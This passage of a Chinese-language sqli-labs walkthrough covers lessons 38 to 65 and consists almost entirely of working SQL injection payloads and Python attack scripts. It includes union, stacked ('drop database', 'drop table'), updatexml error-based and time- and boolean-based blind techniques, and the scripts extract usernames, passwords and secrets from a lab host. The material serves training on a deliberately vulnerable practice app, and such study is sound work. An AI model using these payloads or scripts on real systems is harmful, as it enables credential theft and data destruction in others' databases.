堆叠注入,可以执行多条sql语句,查看数据库内容可以用联合注入,用 ; 分割可执行任意sql语句。甚至是删除数据库;drop database security;--+
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-39
-
同less-38,整数型,可以执行任意sql语句。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-40
-
同less-38,单引号加括号闭合。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-41
-
同less-38,整型。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-42
-
可以用前面的二次注入,也可以堆叠注入:注入点在login.php的password中,比如说复制一个表。
login_user=1&login_password=1';create table a like users;--+
less-43
-
同less-42,单引号加括号闭合。
login_user=1&login_password=1');create table a like users;--+
less-44
-
同less-42
login_user=1&login_password=1';create table a like users;--+
less-45
-
同less-43
login_user=1&login_password=1');drop table a;--+
less-46
-
order by从句。有报错回显,整型。
?sort=0 and updatexml(1,concat(1,(select database())),1)--+ ?sort=0 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0 and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-47
-
同less-46,单引号闭合。
?sort=0' and updatexml(1,concat(1,(select database())),1)--+ ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-48
- 时间盲注
# Time-based blind extraction script for sqli-labs Less-48.
# The injection point is the numeric ORDER BY parameter (sort); the probe
# calls sleep(2) when its condition holds and the 1 s client timeout turns
# that delay into an exception.
import requests

url = 'http://192.168.3.39:84/Less-48/?sort=0||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(2): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # answered quickly: character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-49
- 时间盲注
# Time-based blind extraction script for sqli-labs Less-49.
# Same oracle as the Less-48 script; the sort parameter is closed with a
# single quote here.
import requests

url = 'http://192.168.3.39:84/Less-49/?sort=0\'||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(2): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-50
- 时间盲注
# Time-based blind extraction script for sqli-labs Less-50.
# Same oracle as the Less-48 script (numeric sort parameter, sleep(2) versus
# a 1 s client timeout); only the lesson path differs.
import requests

url = 'http://192.168.3.39:84/Less-50/?sort=0||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(2): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-51
-
时间盲注,堆叠注入,报错注入都行,和前面的差不多了
?sort=0' and updatexml(1,concat(1,(select database())),1)--+ ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-52
- 时间盲注,堆叠注入。
# Time-based blind extraction script for sqli-labs Less-52.
# Same oracle as the Less-48 script (numeric sort parameter, sleep(2) versus
# a 1 s client timeout); only the lesson path differs.
import requests

url = 'http://192.168.3.39:84/Less-52/?sort=0||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(2): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-53
- 时间盲注,堆叠注入。
# Time-based blind extraction script for sqli-labs Less-53.
# Same oracle as the Less-49 script (sort parameter closed with a single
# quote, sleep(2) versus a 1 s client timeout); only the lesson path differs.
import requests

url = 'http://192.168.3.39:84/Less-53/?sort=0\'||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(2): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-54
-
和前面的类似,但是有次数限制,首先应该测闭合方式,最常见的就是引号闭合。从这题开始,数据库、表、字段、内容都可能不一样,需要一步步尝试获取。
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='GAC1FTFF3I'--+ 查看字段 ?id=0' union select 1,2,group_concat(sessid,0x3e,secret_SBM0,0x3e,tryy) from GAC1FTFF3I--+ 查看内容。
less-55
-
同less-54。
?id=0) union select 1,2,database()--+ 查看数据库 ?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+ 查看字段 ?id=0) union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+ 查看内容。
less-56
-
同less-54。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+ 查看字段 ?id=0') union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+ 查看内容。
less-57
-
同less-54。
?id=0" union select 1,2,database()--+ 查看数据库 ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BJGSBTXAB5'--+ 查看字段 ?id=0" union select 1,2,group_concat(sessid,0x3e,secret_5M6O,0x3e,tryy) from BJGSBTXAB5--+ 查看内容。
less-58
-
报错注入,和上面差不多,但次数限制为5次,试闭合可能就用完了。所以可以直接从表开始查起,不查数据库,因为不一定需要。
?id=0'||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='MGJP2WHM3Y')),2)--+ 查看字段 ?id=0'||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_24RK,0x3e,tryy) from MGJP2WHM3Y),1,32)),2)--+ 查看内容。
less-59
-
同less-58。
?id=0||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='LT7KPWCFHN')),2)--+ 查看字段 ?id=0||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_ARJK,0x3e,tryy) from LT7KPWCFHN),1,32)),2)--+ 查看内容。
less-60
-
同less-58。
?id=0")||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0")||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0")||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+ 查看字段 ?id=0")||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_YEKB,0x3e,tryy) from VFQELTLHRF),1,32)),2)--+ 查看内容。
less-61
-
同less-58。
?id=0'))||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0'))||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0'))||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+ 查看字段 ?id=0'))||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_90EI,0x3e,tryy) from H3TPPX9L6M),1,32)),2)--+ 查看内容。
less-62
- 盲注,能用布尔盲注就用布尔盲注。
import requests
url = "http://192.168.3.39:84/Less-62/?id=0')||"

# Boolean-based blind extraction against the lab target above.
# The injected if() evaluates to 1 or 0; the response is treated as the
# "true" branch when its body contains the string "Angelina".
# Each character is recovered with a binary search over ASCII 32..127.
result = ''
pos = 0
while True:
    pos += 1
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Earlier stages of the same walk, kept for reference:
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="BVOP9BQ5Y1")),%d,1))>%d,1,0)--+'%(pos,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_1BQG))from(BVOP9BQ5Y1)),%d,1))>%d,1,0)--+' % (pos, mid)
        body = requests.get(url + payload).text
        if "Angelina" not in body:
            # "false" branch -> the character is mid or lower.
            hi = mid
        else:
            # "true" branch -> the character is above mid.
            lo = mid + 1
    # lo stays at 32 only when the condition was never true for this
    # position; the script takes that as the end of the data (a literal
    # space, ASCII 32, would end the walk too).
    if lo == 32:
        break
    result += chr(lo)
print(result)
less-63
- 同less-62,先点右上角的 Reset the challenge!。因为有次数限制,先重置一下。
import requests
url = "http://192.168.3.39:84/Less-63/?id=0'||"

# Boolean-based blind extraction against the lab target above (same walk
# as Less-62, only the closing quote in the URL differs).
# The injected if() evaluates to 1 or 0; the response is treated as the
# "true" branch when its body contains the string "Angelina".
# Each character is recovered with a binary search over ASCII 32..127.
result = ''
pos = 0
while True:
    pos += 1
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Earlier stages of the same walk, kept for reference:
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="1TR0A8MPVK")),%d,1))>%d,1,0)--+'%(pos,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_A7M1))from(1TR0A8MPVK)),%d,1))>%d,1,0)--+' % (pos, mid)
        body = requests.get(url + payload).text
        if "Angelina" not in body:
            # "false" branch -> the character is mid or lower.
            hi = mid
        else:
            # "true" branch -> the character is above mid.
            lo = mid + 1
    # lo stays at 32 only when the condition was never true for this
    # position; the script takes that as the end of the data (a literal
    # space, ASCII 32, would end the walk too).
    if lo == 32:
        break
    result += chr(lo)
print(result)
less-64
- 同less-63。
import requests
url = "http://192.168.3.39:84/Less-64/?id=0))||"

# Boolean-based blind extraction against the lab target above (same walk
# as Less-62, only the closing parentheses in the URL differ).
# The injected if() evaluates to 1 or 0; the response is treated as the
# "true" branch when its body contains the string "Angelina".
# Each character is recovered with a binary search over ASCII 32..127.
result = ''
pos = 0
while True:
    pos += 1
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Earlier stages of the same walk, kept for reference:
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="R4BFEIU6PA")),%d,1))>%d,1,0)--+'%(pos,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_QVX3))from(R4BFEIU6PA)),%d,1))>%d,1,0)--+' % (pos, mid)
        body = requests.get(url + payload).text
        if "Angelina" not in body:
            # "false" branch -> the character is mid or lower.
            hi = mid
        else:
            # "true" branch -> the character is above mid.
            lo = mid + 1
    # lo stays at 32 only when the condition was never true for this
    # position; the script takes that as the end of the data (a literal
    # space, ASCII 32, would end the walk too).
    if lo == 32:
        break
    result += chr(lo)
print(result)
less-65
- 同less-63。
import requests
url = "http://192.168.3.39:84/Less-65/?id=0\")||"

# Boolean-based blind extraction against the lab target above (same walk
# as Less-62, only the closing quote/parenthesis in the URL differ).
# The injected if() evaluates to 1 or 0; the response is treated as the
# "true" branch when its body contains the string "Angelina".
# Each character is recovered with a binary search over ASCII 32..127.
result = ''
pos = 0
while True:
    pos += 1
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Earlier stages of the same walk, kept for reference:
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(pos,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="2WU00QD714")),%d,1))>%d,1,0)--+'%(pos,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_3IE7))from(2WU00QD714)),%d,1))>%d,1,0)--+' % (pos, mid)
        body = requests.get(url + payload).text
        if "Angelina" not in body:
            # "false" branch -> the character is mid or lower.
            hi = mid
        else:
            # "true" branch -> the character is above mid.
            lo = mid + 1
    # lo stays at 32 only when the condition was never true for this
    # position; the script takes that as the end of the data (a literal
    # space, ASCII 32, would end the walk too).
    if lo == 32:
        break
    result += chr(lo)
print(result)
三、结束
- 注入方法就那几种,在比赛时,一是找注入点,二是绕过过滤处理。